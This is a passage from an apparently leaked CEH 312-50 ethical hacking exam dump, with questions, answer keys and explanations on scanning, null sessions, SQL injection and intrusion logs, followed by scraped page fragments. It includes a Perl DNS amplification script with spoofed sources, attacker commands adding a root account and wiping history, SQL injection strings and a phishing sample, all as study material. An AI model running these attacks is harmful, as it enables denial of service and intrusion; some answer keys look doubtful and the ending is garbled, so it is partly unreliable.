on the system. The first thing is to ensure that the sequence of identification numbers issued by
the session management system is unpredictable; otherwise, it's trivial to hijack another user's
session. Having a large number of possible session IDs (meaning that they should be very long)
means that there are a lot more permutations for an attacker to try.
QUESTION NO: 271
Maurine is working as a security consultant for Hinklemeir Associates. She has asked the Systems
Administrator to create a group policy that would not allow null sessions on the network. The
Systems Administrator is fresh out of college and has never heard of null sessions and does not
know what they are used for. Maurine is trying to explain to the Systems Administrator that
hackers will try to create a null session when footprinting the network.
Why would an attacker try to create a null session with a computer on a network?
m
A. To create a user with administrative privileges for later use
B. Enumerate users and shares
C. Install a backdoor for later attacks
D. Escalate his/her privileges on the target server
.co
sts
Answer: B
Explanation:
lTe
The Null Session is often referred to as the "Holy Grail" of Windows hacking. Listed as the number
5 windows vulnerability on the SANS/FBI Top 20 list, Null Sessions take advantage of flaws in the
CIFS/SMB (Common Internet File System/Server Messaging Block) architecture. You can
tua
establish a Null Session with a Windows (NT/2000/XP) host by logging on with a null user name
and password. Using these null connections allows you to gather the following information from
the host:
- List of users and groups
Ac
- List of machines
- List of shares
- Users and host SID' (Security Identifiers)
QUESTION NO: 272
You are performing a port scan on a subnet that has the ICMP protocol blocked. You discover 23
live systems and after doing a port scan on each of them; you notice that they all show port 21 in
closed state. What would be the next logical step that you should perform?
A. Perform a ping sweep to identify any additional systems that might be up

B. Connect to open ports to discover applications

C. Perform a SYN scan on port 21 to identify any additional systems that might be up
D. Rescan every computer to verify the results
Answer: C
Explanation:
As ICMP is blocked you'll have trouble determining which computers are up and running by using
a ping sweep. As all the 23 computers that you had discovered earlier had port 21 closed,
probably any additional, previously unknown, systems will also have port 21 closed. By running a
SYN scan on port 21 over the target network you might get replies from additional systems.
QUESTION NO: 273
While examining audit logs, you discover that people are able to telnet into the SMTP server on
port 25. You would like to block this, though you do not see any evidence of an attack or other
m
wrong doing. However, you are concerned about affecting the normal functionality of the email
.co
server. From the following options choose how best you can achieve this objective?
A. Block port 25 at the firewall

B. Shut off the SMTP service on the server
sts
C. Force all connections to use a username and password

D. None of the above
lTe
E. Switch from Windows Exchange to UNIX Sendmail
Answer: D
tua
Explanation:
Blocking port 25 in the firewall or forcing all connections to use username and password would
have the consequences that the server is unable to communicate with other SMTP servers.
Ac
Turning of the SMTP service would disable the email function completely. All email servers use
SMTP to communicate with other email servers and therefore changing email server will not help.
QUESTION NO: 274
_____ is the process of converting something from one representation to the simplest form. It
deals with the way in which systems convert data from one form to another.
A. UCS transformation formats

B. Character Encoding
C. Canonicalization
D. Character Mapping

Answer: C
Explanation:
Canonicalization (abbreviated c14n ) is the process of converting data that has more than one
possible representation into a "standard" canonical representation. This can be done to compare
different representations for equivalence, to count the number of distinct data structures (e.g., in
combinatorics), to improve the efficiency of various algorithms by eliminating repeated
calculations, or to make it possible to impose a meaningful sorting order.
QUESTION NO: 275
A specific site received 91 ICMP_ECHO packets within 90 minutes from 47 different sites. 77 of
the ICMP_ECHO packets had an ICMP ID:39612 and Seq:57072. 13 of the ICMP_ECHO packets
had an ICMP ID:0 and Seq:0. What can you infer from this information?
m
A. 13 packets were from an external network and probably behind a NAT, as they had an ICMP ID
0 and Seq 0 .co
B. ICMP ID and Seq numbers were most likely set by a tool and not by the operating system
C. All 77 packets came from the same LAN segment and hence had the same ICMP ID and Seq
sts
number
D. The packets were sent by a worm spoofing the IP addresses of 47 infected sites
lTe
Answer: B
tua
QUESTION NO: 276
Harold has just been hired on as the senior network administrator for the University of Central
Michigan. He essentially is in charge of 200 servers and about 10,000 client computers. Because
Ac
of the immense network size of the university, Harold wants to centrally manage the network as
much as possible.
Harold supervises 10 server administrators, 4 Exchange administrators, and 20 help desk

technicians. Because of the separated job duties, Harold wants to ensure that nothing is changed
on the network without his knowledge and consent. His main concern is the 200 servers his
subordinates take care of.
Harold wants to be alerted whenever critical files, folders, shares, etc are changed on any of the
servers, and he wants all this information available to him from one management console, not a
console on each individual server. What tool could Harold use to centrally manage any changes
on his servers?

A. SAINT
B. Nessus
C. SATAN
D. Tripwire
Answer: D
QUESTION NO: 277
This is an authentication method in which is used to prove that a party knows a password without
transmitting the password in any recoverable form over a network. This authentication is secure
because the password is never transmitted over the network, even in hashed form; only a random
number and an encrypted random number are sent.
A. Realm Authentication
m
B. SSL Authentication
C. Basic Form Authentication
D. Challenge/Response Authentication
.co
E. Cryptographic Authentication
sts
Answer: D
lTe
QUESTION NO: 278
Bob wants to prevent attackers from sniffing his passwords on the wired network. Which of the
tua
following lists the best options?
A. RSA, LSA, POP

Ac
B. SMB, SMTP, Smart card

C. SSID, WEP, Kerberos
D. Kerberos, Smart card, Stanford SRP
Answer: D
Explanation:
Kerberos, Smart cards and Stanford SRP are techniques where the password never leaves the
computer.
QUESTION NO: 279
During the intelligence-gathering phase of a penetration test, you discover a press release by a
security products vendor stating that they have signed a multi-million dollar agreement with the
company you are targeting. The contract was for vulnerability assessment tools and network
based IDS systems.
While researching on that particular brand of IDS you notice that its default installation allows it to
perform sniffing and attack analysis on one NIC and is managed and sends reports via another
NIC. The sniffing interface is completely unbound from the TCP/IP stack by default. Assuming the
defaults were used, how can you detect these sniffing interfaces?
A. Send attack traffic and look for it to be dropped by the IDS

B. Use a ping flood against the IP of the sniffing NIC and look for latency in the responses
C. Set your IP to that of the IDS and look for it to begin trying to knock your computer off the
network
D. The sniffing interface cannot be detected
Answer: D
m
Explanation:
When a Nic is set to Promiscuous mode it just blindly takes whatever comes through to it network
.co
interface and sends it to the Application layer. This is why they are so hard to detect. Actually you
could use ARP requests and Send them to every pc and the one which responds to all the
sts
requests can be identified as a NIC on Promiscuous mode and there are some very special
programs that can do this for you. But considering the alternatives in the question the right answer
has to be that the interface cannot be detected.
lTe
QUESTION NO: 280

tua
After studying the following log entries, how many user IDs can you identify that the attacker has
tampered with?
Ac
1. mkdir -p /etc/X11/applnk/Internet/.etc
2. mkdir -p /etc/X11/applnk/Internet/.etcpasswd
3. touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd
4. touch -acmr /etc /etc/X11/applnk/Internet/.etc
5. passwd nobody -d
6. /usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash
7. passwd dns -d
8. touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd
9. touch -acmr /etc/X11/applnk/Internet/.etc /etc
A. nobody, dns
B. nobody, IUSR_
C. IUSR_

D. acmr, dns
Answer: A
Explanation:
Passwd is the command used to modify a user password and it has been used together with the
usernames nobody and dns.
QUESTION NO: 281
Bank of Timbuktu is a medium-sized, regional financial institution in Timbuktu. The bank has
deployed a new Internet-accessible Web application recently. Customers can access their account
balances, transfer money between accounts, pay bills and conduct online financial business using
a Web browser.
m
John Stevens is in charge of information security at Bank of Timbuktu. After one month in
.co
production, several customers have complained about the Internet enabled banking application.
Strangely, the account balances of many of the bank's customers had been changed! However,
money hasn't been removed from the bank; instead, money was transferred between accounts.
sts
Given this attack profile, John Stevens reviewed the Web application's logs and found the
following entries:
lTe
Attempted login of unknown user: johnm

Attempted login of unknown user: susaR
Attempted login of unknown user: sencat
tua
Attempted login of unknown user: pete'';

Attempted login of unknown user: ' or 1=1--
Attempted login of unknown user: '; drop table logins--
Ac
Login of user jason, sessionID= 0x75627578626F6F6B

Login of user daniel, sessionID= 0x98627579539E13BE
Login of user rebecca, sessionID= 0x9062757944CCB811
Login of user mike, sessionID= 0x9062757935FB5C64
Transfer Funds user jason
Pay Bill user mike
Logout of user mike
What kind of attack did the Hacker attempt to carry out at the bank?
A. The Hacker first attempted logins with suspected user names, then used SQL Injection to gain
access to valid bank login IDs.
B. Brute force attack in which the Hacker attempted guessing login ID and password from
password cracking tools.

C. The Hacker attempted Session hijacking, in which the Hacker opened an account with the
bank, then logged in to receive a session ID, guessed the next ID and took over Jason's session.
D. The Hacker used a generator module to pass results to the Web server and exploited Web
application CGI vulnerability.
Answer: A
Explanation:
Typing things like ' or 1=1 - in the login field is evidence of a hacker trying out if the system is
vulnerable to SQL injection.
QUESTION NO: 282
System administrators sometimes post questions to newsgroups when they run into technical
challenges. As an ethical hacker, you could use the information in newsgroup postings to glean
m
insight into the makeup of a target network. How would you search for these posting using Google
search? .co
A. Search for the target company name at http://groups.google.com
B. Search in Google using the key search strings "the target company" and "newsgroups"
sts
C. Use NNTP websites to search for these postings

D. Search in Google using the key search strings "the target company" and "forums"
lTe
Answer: A
Explanation:
tua
Using http://groups.google.com is the easiest way to access various newsgroups today. Before
http://groups.google.com you had to use special NNTP clients or subscribe to some nntp to web
services.
Ac
QUESTION NO: 283
While attempting to discover the remote operating system on the target computer, you receive the
following results from an nmap scan:
Starting nmap V. 3.10ALPHA9 ( www.insecure.org/nmap/ )

Interesting ports on 172.121.12.222:
(The 1592 ports scanned but not shown below are in state: filtered)
PortStateService
21/tcpopenftp
25/tcpopensmtp

53/tcpcloseddomain
80/tcpopenhttp
443/tcpopenhttp
Remote operating system guess: Too many signatures match to reliably guess the OS.
Nmap run completed -- 1 IP address (1 host up) scanned in 277.483 seconds
What would you do next to fingerprint the OS?
A. Perform a tcp traceroute to the system using port 53

B. Run an nmap scan with the -vv option
C. Perform a Firewalk with that system as the target IP
D. Connect to the active services and review the banner information
m
Answer: D
Explanation:
.co
Most people don't care about changing the banners presented by applications listening to open
ports and therefore you should get fairly accurate information when grabbing banners from open
sts
ports with, for example, a telnet application.
lTe
QUESTION NO: 284
What can you conclude from the following nmap results?

tua
Starting nmap V. 3.10ALPHA9 ( www.insecure.org/nmap/ )

Interesting ports on 192.168.1.1:
Ac
(The 1592 ports scanned but not shown below are in state: closed)
PortStateService
21/tcpopenftp
25/tcpopensmtp
80/tcpopenhttp
389/tcpopenldap
443/tcpopenhttps
3268/tcpopengc
Remote operating system guess: Too many signatures match to reliably guess the OS.
Nmap run completed -- 1 IP address (1 host up) scanned in 91.66 seconds

A. The system is not running Linux or Solaris
B. The system is not firewall enabled
C. The system is a Windows Domain Controller
D. The system is not properly patched
Answer: B,C
Explanation:
There is no reports of any ports being filtered.
QUESTION NO: 285
A company is legally liable for the content of email that is sent from its systems, regardless of
whether the message was sent for private or business-related purposes. This could lead to
prosecution for the sender and for the company's directors if, for example, outgoing email was
m
found to contain material that was pornographic, racist, or likely to incite someone to commit an
act of terrorism. .co
You can always defend yourself by "ignorance of the law" clause.
sts
A. False
B. True
lTe
Answer: A
Explanation:
tua
Ignorantia juris non excusat or Ignorantia legis neminem excusat (Latin for "ignorance of the law
does not excuse" or "ignorance of the law excuses no one") is a public policy holding that a person
who is unaware of a law may not escape liability for violating that law merely because he or she
Ac
was unaware of its content; that is, persons have presumed knowledge of the law. Presumed
knowledge of the law is the principle in jurisprudence that one is bound by a law even if one does
not know of it. It has also been defined as the "prohibition of ignorance of the law".
QUESTION NO: 286
Port scans are often used to profile systems before they are attacked. Knowing what ports are
open allows an attacker to determine which services can be attacked.
How do you prevent a hacker from launching FIN, NULL, and X-MAS scans on your network?
A. Block TCP/IP packets with FIN flag enabled at the firewall

B. Enable IDS signatures to block these scans

C. You cannot block a hacker from launching these scans on your network
D. Modify the kernel to never send reset (RST) packets
Answer: D
QUESTION NO: 287
Within the context of Computer Security, which of the following statements describes Social
Engineering best?
A. Social Engineering is the means put in place by human resource to perform time accounting
B. Social Engineering is a training program within sociology studies
C. Social Engineering is the act of publicly disclosing information
D. Social Engineering is the act of getting needed information from a person rather than breaking
into a system
m
Answer: D
Explanation:
.co
Social engineering is a collection of techniques used to manipulate people into performing actions
sts
or divulging confidential information.
lTe
QUESTION NO: 288
Jane wishes to forward X-Windows traffic to a remote host as well as POP3 traffic. She is worried
tua
that adversaries might be monitoring the communication link and could inspect captured traffic.
She would like to tunnel the information to the remote end but does not have VPN capabilities to
do so. Which of the following tools can she use to protect the link?
Ac
A. RSA
B. PGP
C. SSH
D. MD5
Answer: C
Explanation:
Port forwarding, or tunneling, is a way to forward otherwise insecure TCP traffic through SSH
Secure Shell. You can secure for example POP3, SMTP and HTTP connections that would
otherwise be insecure.

QUESTION NO: 289
Choose one of the following pseudo codes to describe this statement:
f we have written 200 characters to the buffer variable, the stack should stop because it cannot
hold any more data.
A. If (I < 200) then exit (1)

B. If (I > 200) then exit (1)
C. If (I <= 200) then exit (1)
D. If (I >= 200) then exit (1)
Answer: D
QUESTION NO: 290
m
Study the following e-mail message.
.co
Dear SuperShopper valued member,
sts
Due to concerns, for the safety and integrity of the SuperShopper community we have issued this
warning message. It has come to our attention that your account information needs to be updated
lTe
due to inactive members, frauds and spoof reports.
If you could please take 5-10 minutes out of your online experience and renew your records you
tua
will not run into any future problems with the online service. However, failure to update your
records will result to your account cancellation. This notification expires within 24 hours.
Once you have updated your account records your SuperShopper will not be interrupted and will
Ac
continue as normal.
Please follow the link below and renew your account information.
https://www.supershopper.com/cgi-bin/webscr?cmd=update-run
SuperShopper Technical Support

http://www.supershopper.com
The link takes you to an address like: http://hacker.xsecurity.com/in.htm. Note that

hacker.xsecurity.com is not an official SuperShopper site!
What attack is depicted in the e-mail?

A. Man in the middle attack
B. social engineering
C. Phishing attack
D. E-mail spoofing
Answer: C
Explanation:
Phishing is a criminal activity using social engineering techniques. Phishers attempt to
fraudulently acquire sensitive information, such as passwords and credit card details, by
masquerading as a trustworthy person or business in an electronic communication. Phishing is
typically carried out using email or an instant message, although phone contact has been used as
well.
m
QUESTION NO: 291
.co
Which of the following LM hashes represents a password of less than 8 characters?
A. 0182BD0BD4444BF836077A718CCDF409
B. 44EFCE164AB921CQAAD3B435B51404EE
sts
C. BA810DBA98995F1817306D272A9441BB
D. E52CAC67419A9A224A3B108F3FA6CB6D
lTe
E. CEC52EB9C8E3455DC2265B23734E0DAC
F. B757BF5C0D87772FAAD3B435B51404EE
Answer: B,F
tua
Explanation:
Notice the last 8 characters are the same
Ac
QUESTION NO: 292
A user on your Windows 2000 network has discovered that he can use L0phtcrack to sniff the
SMB exchange which carries user logons. The user is plugged into a hub with 23 other systems.
However, he is unable to capture any logons though he knows that other users are logging on.
What do you think is the most likely reason behind this?
A. L0phtcrack only sniffs logons to web servers

B. Kerberos is preventing it
C. There is a NIDS present on that segment
D. Windows logons cannot be sniffed

Answer: B
Explanation:
In a Windows 2000 network using Kerberos you normally use pre-authentication and the user
password never leaves the local machine so it is never exposed to the network so it should not be
able to be sniffed.
QUESTION NO: 293
Michael is a junior security analyst working for the National Security Agency (NSA) working
primarily on breaking terrorist encrypted messages. The NSA has a number of methods they use
to decipher encrypted messages including Government Access to Keys (GAK) and inside
informants. The NSA holds secret backdoor keys to many of the encryption algorithms used on the
Internet. The problem for the NSA, and Michael, is that terrorist organizations are starting to use
m
custom-built algorithms or obscure algorithms purchased from corrupt governments. For this
reason, Michael and other security analysts like him have been forced to find different methods of
deciphering terrorist messages. .co
One method that Michael thought of using was to hide malicious code inside seemingly harmless
sts
programs. Michael first monitors sites and bulletin boards used by known terrorists, and then he is
able to glean email addresses to some of these suspected terrorists. Michael then inserts a stealth
keylogger into a mapping program file readme.txt and then sends that as an attachment to the
lTe
terrorist. This keylogger takes screenshots every 2 minutes and also logs all keyboard activity into
a hidden file on the terrorist's computer. Then, the keylogger emails those files to Michael twice a
day with a built in SMTP server.
tua
What technique has Michael used to disguise this keylogging software?

Ac
A. Wrapping
B. Hidden channels
C. Steganography
D. ADS
Answer: C
QUESTION NO: 294
John is the network administrator of XSECURITY systems. His network was recently
compromised. He analyzes the logfiles to investigate the attack.
Take a look at the following Linux logfile snippet. The hacker compromised and "owned" a Linux
machine. What is the hacker trying to accomplish here?
[root@apollo /]# rm rootkit.c

root@apollo /]# [root@apollo /]# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ;
rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm -
rf /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/por359 ? 00:00:00 inetd
59 ? 00:00:00 inetd
m: cannot remove `/tmp/h': No such file or directory
m: cannot remove `/usr/sbin/rpc.portmap': No such file or directory
[root@apollo /]# ps -aux | grep portmap
root@apollo /]# [root@apollo /]# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ;
rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm -
rf /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/por359 ? 00:00:00 inetd
m: cannot remove `/sbin/portmap': No such file or directory
m: cannot remove `/tmp/h': No such file or directory
>rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory
m
root@apollo /]# rm: cannot remove `/sbin/portmap': No such file or directory
.co
A. The hacker is attempting to compromise more machines on the network
B. The hacker is trying to cover his tracks
C. The hacker is running a buffer overflow exploit to lock down the system
sts
D. The hacker is planting a rootkit
Answer: B
lTe
Explanation:
By deleting temporary directories and emptying like bash_history that contains the last commands
tua
used with the bash shell he is trying to cover his tracks.

Ac
QUESTION NO: 295
John has performed a scan of the web server with NMAP but did not gather enough information to
accurately identify which operating system is running on the remote host. How could you use a
web server to help in identifying the OS that is being used?
A. Telnet to port 8080 on the web server and look at the default page code
B. Telnet to an open port and grab the banner
C. Connect to the web server with an FTP client
D. Connect to the web server with a browser and look at the web page
Answer: B
Explanation:

Most people don't care about changing the banners presented by applications listening to open
ports and therefore you should get fairly accurate information when grabbing banners from open
ports with, for example, a telnet application.
QUESTION NO: 296
After a client sends a connection request (SYN) packet to the server, the server will respond
(SYN-ACK) with a sequence number of its choosing, which then must be acknowledged (ACK) by
the client. This sequence number is predictable; the attack connects to a service first with its own
IP address, records the sequence number chosen, and then opens a second connection from a
forged IP address. The attack doesn't see the SYN-ACK (or any other packet) from the server, but
can guess the correct responses. If the source IP address is used for authentication, then the
attacker can use the one-sided communication to break into the server.
m
What attacks can you successfully launch against a server using the above technique?
A. Web page defacement attacks

B. Session Hijacking attacks
.co
C. Denial of Service attacks
sts
D. IP spoofing attacks
Answer: B
lTe
Explanation:
The term Session Hijacking refers to the exploitation of a valid computer session - sometimes also
tua
called a session key - to gain unauthorised access to information or services in a computer

system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to
a remote server. It has particular relevance to web developers, as the HTTP cookies used to
maintain a session on many web sites can be easily stolen by an attacker using an intermediary
Ac
computer or with access to the saved cookies on the victim's computer.
QUESTION NO: 297
A file integrity program such as Tripwire protects against Trojan horse attacks by:
A. Using programming hooks to inform the kernel of Trojan horse behavior

B. Rejecting packets generated by Trojan horse programs
C. Helping you catch unexpected changes to a system utility file that might indicate it had been
replaced by a Trojan horse
D. Automatically deleting Trojan horse programs

Answer: C
Explanation:
Tripwire generates a database of the most common files and directories on your system. Once it is
generated, you can then check the current state of your system against the original database and
get a report of all the files that have been modified, deleted or added. This comes in handy if you
allow other people access to your machine and even if you don't, if someone else does get
access, you'll know if they tried to modify files such as /bin/login etc.
QUESTION NO: 298
You have been charged with performing a number of security tests against a partner organization
in Australia. Your boss, who is in charge of your company and the partner company's IT
departments, wants you to run tests just like an outside hacker would against their network. He
m
also wants you to perform all of your tests without tipping off the IT department at the partner
company. You have no knowledge of the partner company's systems other than their name and
.co
their external website. You decide to perform some passive scanning so as not to tip off anyone at
the partner company.?
sts
What would be considered passive scanning?
A. Firewalking
lTe
B. Whois
C. Netcraft
D. Friendly Pinger
tua
Answer: B,C
Ac
QUESTION NO: 299
Jack is conducting a port scan of a target network. He knows that his target network has a web
server and that a mail server is up and running. Jack has been sweeping the network but has not
been able to get any responses from the remote target. Check all of the following that could be a
likely cause of the lack of response?
A. The destination network might be down

B. The packet TTL value is too low and cannot reach the target
C. The host might be down
D. UDP is filtered by a gateway
E. The TCP window size does not match
F. ICMP is filtered by a gateway

Answer: A,B,C,F
Explanation:
If the destination host or the destination network is down there is no way to get an answer and if
TTL (Time To Live) is set too low the UDP packets will "die" before reaching the host because of
too many hops between the scanning computer and the target. The TCP receive window size is
the amount of received data (in bytes) that can be buffered during a connection. The sending host
can send only that amount of data before it must wait for an acknowledgment and window update
from the receiving host and ICMP is mainly used for echo requests and not in port scans.
QUESTION NO: 300
A Hacker would typically use a botnet to send a large number of queries to open DNS servers.
These queries will be "spoofed" to look like they come from the target of the flooding, and the DNS
m
server will reply to that network address.
.co
It is generally possible to stop the more-common bot-delivered attack by blocking traffic from the
attacking machines, which are identifiable. But blocking queries from DNS servers brings
problems in its wake. A DNS server has a valid role to play in the workings of the Internet.
sts
Blocking traffic to a DNS server could also mean blocking legitimate users from sending e-mail or
visiting a Web site. A single DNS query could trigger a response that is as much as 73 times larger
than the request.
lTe
The following perl code can launch these attacks.

tua
use Net::DNS::Resolver;
use Net::RawIP;
open(LIST,"ns.list");
Ac
@list=<LIST>;
close LIST;
chomp(@list);
my $lnum=@list;
my $i=0;
my $loop=0;
if ($ARGV[0] eq '') {
print "Usage: ./hackme.pl <target IP> <loop
count>\n";
exit(0);
}
while($loop < $ARGV[1]) {
while($i < $lnum) {
my $source = $ARGV[0];
my $dnspkt = new Net::DNS::Packet("google.com","ANY");
my $pktdata = $dnspkt->data;
my $sock = new Net::RawIP({udp=>{}});
?sock->set({ip => { saddr => $source, daddr => $list[$i], frag_off=>0,tos=>0,id=>1565}, udp =>
{source => 53, dest => 53, data=>$pktdata} });
$sock->send;
$i++;
}$loop++; $i=0;}
exit(0);
What type of attacks are these?
A. DNS reflector and amplification attack

B. DNS cache poisoning attacks
C. DNS forward lookup attacks
m
D. DNS reverse connection attacks
Answer: A .co
sts
QUESTION NO: 301
An employee wants to bypass detection by a network-based IDS application and does not want to
lTe
attack the system containing the IDS application. Which of the following strategies can the
employee use to evade detection by a network-based IDS application?
tua
A. Create a ping flood

B. Create multiple false positives
C. Create a covert network tunnel
D. Create a SYN flood
Ac
Answer: C
Explanation:
HTTP Tunneling is a technique by which communications performed using various network
protocols are encapsulated using the HTTP protocol, the network protocols in question usually
belonging to the TCP/IP family of protocols. The HTTP protocol therefore acts as a wrapper for a
covert channel that the network protocol being tunneled uses to communicate. The HTTP stream
with its covert channel is termed a HTTP Tunnel. Very few firewalls blocks outgoing HTTP traffic.
QUESTION NO: 302

A majority of attacks come from insiders, people who have direct access to a company's computer
system as part of their job function or a business relationship. Who is considered an insider?
A. A government agency since they know the company's computer system strengths and
weaknesses
B. A competitor to the company because they can directly benefit from the publicity generated by
making such an attack
C. The CEO of the company because he has access to all of the computer systems
D. Disgruntled employee, customers, suppliers, vendors, business partners, contractors, temps,
and consultants
Answer: D
Explanation:
An insider is anyone who already has an foot inside one way or another.
m
Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2006-09-25 00:01 EST
Host 192.168.0.0 seems to be a subnet broadcast address (returned 4 extra
sts
pings).
Host 192.168.0.1 appears to be up.
lTe
MAC Address: 00:12:17:31:4F:C4 (Cisco-Linksys)

MAC Address: 00:C0:4F:A1:25:4A (Dell Computer)
tua

MAC Address: 00:B0:D0:FE:87:68 (Dell Computer)
MAC Address: 00:C0:4F:A1:25:89 (Dell Computer)
Ac

MAC Address: 00:C0:4F:A1:27:BF (Dell Computer)
MAC Address: 00:0D:88:66:FB:87 (D-Link)
MAC Address: 00:11:D8:90:D6:7F (Asustek Computer)
Host 192.168.0.255 seems to be a subnet broadcast address (returned 4 extra
pings).
Nmap run completed -- 256 IP addresses (8 hosts up) scanned in 4.390 seconds
Which of the following nmap commands in Linux produces the above output?

A. run nmap -TX 192.168.0.1/24
B. sudo nmap -sP 192.168.0.1/24
C. root nmap -sA 192.168.0.1/24
D. launch nmap -PP 192.168.0.1/24
Answer: B
QUESTION NO: 304
Peter extracts the SID list from Windows 2000 Server machine using the hacking tool
"SIDExtracter". Here is the output of the SIDs:
S-1-5-21-1125394485-807628933-549785860-100 John
-1-5-21-1125394485-807628933-549785860-652 Rebecca
m
-1-5-21-1125394485-807628933-549785860-412 Sheela
-1-5-21-1125394485-807628933-549785860-999 Shawn
-1-5-21-1125394485-807628933-549785860-777 Somia
-1-5-21-1125394485-807628933-549785860-500 Chang
.co
-1-5-21-1125394485-807628933-549785860-555 Micah
sts
From the above list identify the user account with System Administrator privileges?
lTe
A. Sheela
B. Shawn
C. Chang
tua
D. Somia
E. Rebecca
F. John
Ac
G. Micah
Answer: C
Explanation:
The SID of the built-in administrator will always follow this example: S-1-5- domain -500
QUESTION NO: 305
Jack is conducting a port scan of a target network. He knows that his target network has a web
server and that a mail server is up and running. Jack has been sweeping the network but has not
been able to get any responses from the remote target. Check all of the following that could be a
likely cause of the lack of response?

A. ICMP is filtered by a gateway
B. The host might be down
C. The TCP window size does not match
D. The destination network might be down
E. UDP is filtered by a gateway
F. The packet TTL value is too low and cannot reach the target
Answer: A,B,D,F
Explanation:
S weeping a network uses ICMP
QUESTION NO: 306
Which of the following would be the best reason for sending a single SMTP message to an
m
address that does not exist within the target company?
.co
A. To gather information about internal hosts used in email treatment
B. To verify information about the Mail administrator
C. To gather information about procedure in place to deal with such messages
sts
D. To create a denial of service attack
Answer: A
lTe
Explanation:
The replay from the email server that states that there is no such recipient will also give you some
tua
information about the name of the email server, versions used and so on.
Ac

312-50 - 7 Version 3.0 PDF

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

312-50 - 7 Version 3.0 PDF

Uploaded by

Copyright:

Available Formats

ECCouncil 312-50

312-50 Ethical Hacking and Countermeasures

A. A tool used to encapsulate packets within a new header and footer

B. An encryption tool to protect the Trojan

"Pass Any Exam. Any Time." - www.actualtests.com 2

-v "Versus" mode. Invert the sense of matching, to

What type of port scan is shown below?

Scan directed at open port:

192.5.2.92:4079 <----NO RESPONSE------192.5.2.110:23

Scan directed at closed port:

"Pass Any Exam. Any Time." - www.actualtests.com 3

A. Derek can use a session replay on the packets captured

"Pass Any Exam. Any Time." - www.actualtests.com 4

launches the command shell.

"Pass Any Exam. Any Time." - www.actualtests.com 5

What can Angela's IT department do to get access to the education website?

"Pass Any Exam. Any Time." - www.actualtests.com 6

Null sessions are un-authenticated connections (not using a username or password.) to an NT or

A. 137 and 139

D. 139 and 443

Machine A: netcat -l -p 1234 < secretfile

A. Use cryptcat instead of netcat

"Pass Any Exam. Any Time." - www.actualtests.com 8

Which port does SMB over TCP/IP use?

"Pass Any Exam. Any Time." - www.actualtests.com 9

[ceh]# ping 10.2.3.4

[ceh]# ./hping2 -c 4 -n -i 2 10.2.3.4

len=46 ip=10.2.3.4 flags=RA seq=2 ttl=128 id=55447 win=0 rtt=0.7 ms

--- 10.2.3.4 hping statistic ---

A. hping2 uses TCP instead of ICMP by default

"Pass Any Exam. Any Time." - www.actualtests.com 10

In the context of Windows Security, what is a 'null' user?

A. An account that has been suspended by the admin

Which definition below best describes a covert channel?

A. A server program using a port that is not well known

C. Making use of a protocol in a way it was not intended to be used

"Pass Any Exam. Any Time." - www.actualtests.com 11

How should you proceed?

What is Paula seeing happen on this computer?

A. Paula's network was scanned using Floppyscan

"Pass Any Exam. Any Time." - www.actualtests.com 12

A. The SSID is still sent inside both client and AP packets

"Pass Any Exam. Any Time." - www.actualtests.com 13

A. Encryption of agent communications will conceal the presence of the agents

"Pass Any Exam. Any Time." - www.actualtests.com 14

A. alert ftp -> ftp (content:"user password root";)

A. By using SQL injection

"Pass Any Exam. Any Time." - www.actualtests.com 15

A. It is easy and extremely effective to gain information

A. Install VNC on her computer

"Pass Any Exam. Any Time." - www.actualtests.com 16

How do you defend against ARP Spoofing?

A. Use ARPWALL system and block ARP spoofing attacks

"Pass Any Exam. Any Time." - www.actualtests.com 17

What should Richard use?

"Pass Any Exam. Any Time." - www.actualtests.com 18

What does ICMP (type 11, code 0) denote?

A. Disable LM authentication in the registry

D. Download and install LMSHUT.EXE tool from Microsoft's website

What tool would be best used to accomplish this?

"Pass Any Exam. Any Time." - www.actualtests.com 20

Which of the following encryption is not based on block cipher?